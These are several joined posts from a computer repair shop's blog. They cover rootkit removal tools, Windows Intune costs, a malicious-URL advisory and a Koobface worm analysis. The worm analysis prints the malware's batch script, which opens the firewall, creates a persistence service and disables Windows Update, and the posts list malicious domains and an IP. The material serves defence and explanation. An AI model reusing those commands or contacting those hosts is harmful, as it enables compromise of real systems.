Lately we at IFix Computers have been dealing with more rootkit infections than normal. These internet nastiness are much more difficult to cleanup and cause a lot of havoc for the user and their networks.

Rootkits, worms, viruses, Trojans are all different forms of infections and can get on your computer in various ways. Gone are the days of you purposefully needing to download an infected program or open a link in an email. Today’s infections have been called “drive-by downloads” and quite often come from infected websites that you have legitimate reason to be there. The infections are called SQL injections and they have infected PBS, Intel as well as thousands of smaller web sites. The fix for the webmasters is easy and in the case of the big boys mentioned above they were repaired in a matter of hours.
In an article from January 2010 titled “Scareware continues to rise reaching $150 Million“ we went over how to cleanup from an infection and some basic prevention measures. It is my desire to get an updated article out on prevention next week, but right now too many people are dealing with already being infected.

In an attempt to help you after a suspected infection, I went to the ever trusty Mike Rosmis and asked him for a list of what he uses and why. Before you think “but I have an anti-virus program” remember infections occur in different ways, getting a flu shot does not prevent the common cold, diverticulitis or cancer, they occur for different reasons, that is why preventive security is so essential.

Mike has been diligent about finding the best ways to clean up infected computers and has done some tracing of where the main attacks or source of these root-kits are coming from, it appears to be China, though that could be a slight of hand done by the coders of the most recent wave of infections.

DANGER WILL ROBINSON – Mike properly warned me to warn you, we are professionals and know the limits and quirks and “got-yas” of these programs, you CAN really screw up your entire computer if something goes awry. If you can afford it, have a professional IT company do this work, at IFix Computers we currently charge between $150 and $200 to do the work described below.

From Mike – Here’s a list of my current A/V tools:
1. TDSSkiller – from Kaspersky.  It scans system32 files and the MBR.  Good to start with this because it’s effective and usually takes no more than 30 seconds to run, even if it finds a rootkit.  It primarily scans for and removes TDSS, TDL3, Alurion, and others.  Symptoms of a rootkit are browser redirection, large quantities of junk files & folders.

2. MBRfix – found on the Mini P.E. CD.  It rewrites the MBR with a generic XP boot sector.  More complicated and time consuming than TDSSkiller, but effective when Windows just won’t cooperate.  It is also useful if TDSSkiller or Combofix hose up your boot sector.
Kent’s note: we only use this on Windows XP machines, not for Vista or Windows 7. If someone has built or knows of a Mini PE for Vista and 7, we would love to know about it.

3. Combofix - The Big Daddy.  Checks for rootkit activity; steps through Windows startup looking for odd behavior; scans system files, replacing infected files with known good files.  Allow at least 20 minutes to run. This program is known to be updated several times a day so be sure to get the latest updates.  Always get a fresh copy.
Kent’s note: this program needs to be run directly from the desktop, not a USB drive or from another folder. I also prefer to run it while the computer is booted into “Safe Mode” first and then again at the regular desktop.

4. Autoruns - Use this if you can’t get to the desktop in Normal Mode and can get to Safe Mode.  It allows you to stop things like ‘hsuebvbhjsg.exe’ from starting up.

5. Spybot Search & Destroy – a good malware scanner, provides passive browser protection through a manually updated hosts file, shows you which BHO’s (Browser Help Objects) and ActiveX’s are installed, has a process explorer and an alternative registry cleaner. Allow 20 minutes for the scanner.  You have to manually tell it to fix what it finds.
Kent’s note: You should right-click on the icon and choose “Run as Administrator” in Vista and I do the same in Windows 7. Also you want to use the “Immunize” and (when in the Advanced Mode) under the “Tools” section go through the “ActiveX”, “BHOs”, and load the “Host File”.

6. MalwareBytes - good, simple malware scanner for civilians.  Update it and run it.  You also have to manually tell it to fix what it finds.  Allow an hour-and-a-half to run for the full scan.
Kent’s note: Under the “Settings” tab, be sure “Terminate Internet Explorer during threat removal” is selected.

7. ESET anti-virus - When properly configured, this program blocks a lot of infections the others don’t. It is also very “light” on system resources allowing you more horsepower to do what you need to on the computer. It cleanups op a lot of crud and can be run in safe mode as a command line tool (don’t be afraid, just run it and it automatically goes to the command line and does what is needed). If you are infected, I would run this in “Safe Mode” after running Combofix.

Well that is it, will this clean all infections? “No”, did we give you every step in configuring these programs? “No”. However, we have given you the tools do clean up your computer as best we can in this short space.

Until we meet again, have a virus (and root-kit) free week.

If you “purchase” Intune for $11 per month per computer (when I refer to a computer I mean a desktop PC, laptop or netbook system) you can upgrade that system to Windows 7 Enterprise Edition if you have XP, Vista or another version of 7 already installed. A promoted benefit is the ability to upgrade to Windows 7 using existing hardware. This of course is a VERY bad idea, Windows 7 is designed to run on hardware that is 18 months or less old, Core 2 Duo type processors, 4 GB of RAM. These technologies were not readily available in XP and many Vista computers. Of course, if you are purchasing new computers from someone that will provide them with no operating system (OS) then you don’t have that worry and should save a few bucks on the systems too.

Since the overall product is internet based, it can be installed and used on computers that are not just at your office but scattered around the globe, such as laptops for your management and sales staff. This is a plus since each computer “reports in” to the Intune console when connected to the internet.

The Intune web based console reports the status of Windows updates, various alerts, provides “endpoint” protection updates. It lets you see the licenses on computers and issue reports of various types. It also allows an administrator to set computer usage policies, all good things to have.

For just $11 a month or just $132 per year, how can you go wrong? Microsoft even has a ROI (Return on Investment) “calculator” to prove its value.

Being the glass is half full type of guy, let’s go over how you could go wrong.

My primary issue with the calculator is Microsoft inserts some permanent and unrealistic numbers into the calculations. For example you only can see how this would work based on 100 computers, that is not realistic for who they are marketing to, users with 10 to 50 computers. I also fault Microsoft since they price your “average” IT expenses at $90,240 per year, way above what any of my clients spend, remove a “0” and you would still end up in our top 10 per year. I mean $902.40 (based on Microsoft’s number of 100 computers) in computers expenses per year per computer. That is way more than most of you would spend repairing a PC, let alone year after year. They also figure end user pay at over $76,000 per year, not in the Ozarks! Other figures and percentages are just as faulty.

Skipping the calculator, let’s cover some of the other features of this product. Intune manages Windows updates for you, of course you could just turn on the automatic updates on the individual computers but hey, let’s not get technical. If you really want to “control” Windows updates, you need a valid reason and you will need to know when to install which updates. Updates just cannot be left undone, if you are going to control which ones install, and when you want them installed, and you are not an IT professional, my question is “Why are you controlling them?” isn’t that beyond your expertise?

There are some alternative programs that will install and watch Windows and other program updates too. One such program is LogMeIn (LMI) Professional with its “Staging” features.

If you have 11 to 50 computers and need a domain (in my humble but amazingly accurate opinion, anyone with over 25 computers should seriously consider a domain), Windows SBS Server 2011 has the Intune features built in, with a web based connection similar to LogMeIn.

The malware protection offered with Intune is much better than what is offered with Office 365. As I wrote about previously, this version covers the entire computer, not just the email. By using Forefront, Microsoft’s server based security product, they up the ante on what is offered. This of course can be replaced by ESET for $59 for the first 2 years and $49 for the next 2 years. With Intune you can manage all subscriptions from the interface, with ESET you would need to buy the server edition to do that. Score 1 for Intune.

Health alerts are available from LMI, Windows Home Server (WHS) and SBS 2011, so I see no advantage there, the same is true with the security policies, though they are not provided by LMI.

Assisting remote users is available with the free version of LMI and of course with SBS 2011.

For those with 10 or less computers, considering a WHS is a good idea. Instead of being in the cloud with Intune, a WHS is located in your business. If you need remote access to manage the other computers you can run it via Remote Desktop, or install LogMeIn Pro ($70 or less a year) or use the FREE version of LMI.

In the next article I will “run the numbers” for you and we will compare the cost of Windows Intune compared to some other options.

Until we meet again, have a virus free week.

Malicious script codes were inserted and being served in webpages which when triggered redirects to malicious links that serves FakeAV malware.

The following are some of the reported Malicious URLs inserted on compromised webpages:
• alexblane(dot)com/ur.php
• alisa-carter(dot)com/ur.php
• books-loader(dot)info/ur.php
• lizamoon(dot)com/ur.php
• milapop(dot)com/ur.php
• t6ryt56(dot)info/ur.php
• tadygus(dot)com/ur.php
• Worid-of-books(dot)com/ur.php
All of these URLs resolve to single IP:   91.213.29.182
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
• GAV: ScrInject.UR (Trojan)
• GAV: Suspicious#asprotect (Trojan)

If you don’t have a SonicWALL with the Gateway AntiVirus (or Comprehensive Security Suite), it is just a matter of time until this pops up on your network. Be prepared or better yet, contact IFix Computers for a SonicWALL that will protect your network.

Until we meet again, have a Fake AV free week!

Sonicwall Research team has discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV web page:

When clicking on “Remove all” or “Cancel” it attemps to initiate the download of:

•bitav_2053_ext6.exe [Detected as TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as: pack.exe [Detected as SecurityTool.W (Trojan)]

Make sure your AntiVirus provides protection against this threat via the following signatures:

Koobface.HJV (Worm)
Koobface.HJV_2 (Worm)
Koobface.HJV_3 (Worm)
Koobface.FF (Trojan)
Delf.EM (Trojan)
TDSS.ABCR (Trojan)
SecurityTool.W (Trojan)

So if you see this happening, get off the internet, reboot your PC and run a complete system series of scans. Check out our past article on how to remove this type of infection.

Here is some more technical jargon about it for those wishing to geek into it.

The Worm performs the following DNS queries:

•www.google.com
•facebook.com
•www.facebook.com
•d.static.ak.fbcdn.net
•x-treme-radio.host22.com
•www.ashiww.com
•www.wahdohotel.nl
•kingswoodwright.com
•kbfgb.greyzzsecure9.com
•3064972.greyzzsecure9.com
The Worm attempts to load various web pages using random page names with the .css extension:
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
•http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
•http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
•http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
•http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
•http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
•http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
•http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
•http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
The Worm installs the following files on the system:

•C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
•C:\WINDOWS\5456456z
•C:\WINDOWS\bt7.dat
•C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
•C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
•C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]
feb.bat contains:
netsh firewall add allowedprogram name=”feb” program=”C:\WINDOWS\system32\svchost.exe” mode=enable
netsh firewall add portopening tcp 8087 feb enable
sc create “ffeb” type= interact type= share start= auto binpath= “C:\WINDOWS\system32\svchost.exe -k ffeb”
reg add “hklm\system\currentcontrolset\services\ffeb\parameters” /v servicedll /t reg_expand_sz /d “C:\WINDOWS\system32\feb.dll” /f
reg add “hklm\system\currentcontrolset\services\ffeb” /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
reg add “hklm\software\microsoft\windows nt\currentversion\svchost” /v ffeb /t reg_multi_sz /d “ffeb\0″ /f
sc start ffeb
feb.dll contains a list or URL’s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL’s contained feb.dll:
•impri{removed}.gr/.lhinrs/
•hk{removed}.org/.ycguh3/
•roomservi{removed}.com.au/.9mov05w/
•nubs.wo{removed}.co.uk/.7txq/
•lenga{removed}.com/.ck5rg8/
•cayenneo{removed}.com/.fplf/
•www.dead{removed}.co.uk/.qe9v/
•ib{removed}.org.il/.5cei7f9/
•www.kurdist{removed}.com/.x5fyik/
•heali{removed}.co.za/.12vatd/
•forwardmar{removed}.org/.6sta03t/
•numerus-{removed}.fr/.li81/
•fino{removed}.com/.ea2cuwa/
•fe{removed}.co.za/.jts51/
•tarr{removed}.com/.5fu3/
•toppla{removed}.nl/.vfnc/
•www.fishingfo{removed}.com/.5wmm9/
The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoAutoUpdate dword:00000001
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoWindowsUpdate dword:00000001
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost ffeb hex(7):66,66,65,62,00,00,
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfg49df “c:\windows\jjp156.exe”
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB NextInstance dword:00000001
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB\0000 Service “feb”
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb ImagePath hex(2):”\??\C:\WINDOWS\system32\drivers\feb.sys”

When the program is run, it detects and removes malicious software it finds on your computer. In theory, the program is not necessary if you are running an up to date anti-virus software but as in all theories an anti-virus alone does not cover all that is needed. This program does provide another layer of protection.

The program is installed with Vista and is available as a free download for Windows XP. You can locate the tool by typing “mrt.exe” in the “Search” field once you click on the “Start” button.

When the program is run, you can choose the type of scan to perform. You can perform a “Quick”, “Full” or “Custom” scan.

If you choose a “Quick” scan, the Malicious Software Removal Tool will scan the areas of a computer that are likely to contain malicious software.

With a “Full” scan, the entire system is checked for malware. I think you should perform a Full scan every once in a while but be aware that it can take a few hours depending on your system.

Finally, you can opt to perform a “Custom scan” and choose the folders or areas of your computer that you want the program to scan.

The results of the scan will indicate whether any malicious software was found on your computer.

Well, I hope using this program helps you remove any malware that is infecting your system. Until we meet again, have a virus free week.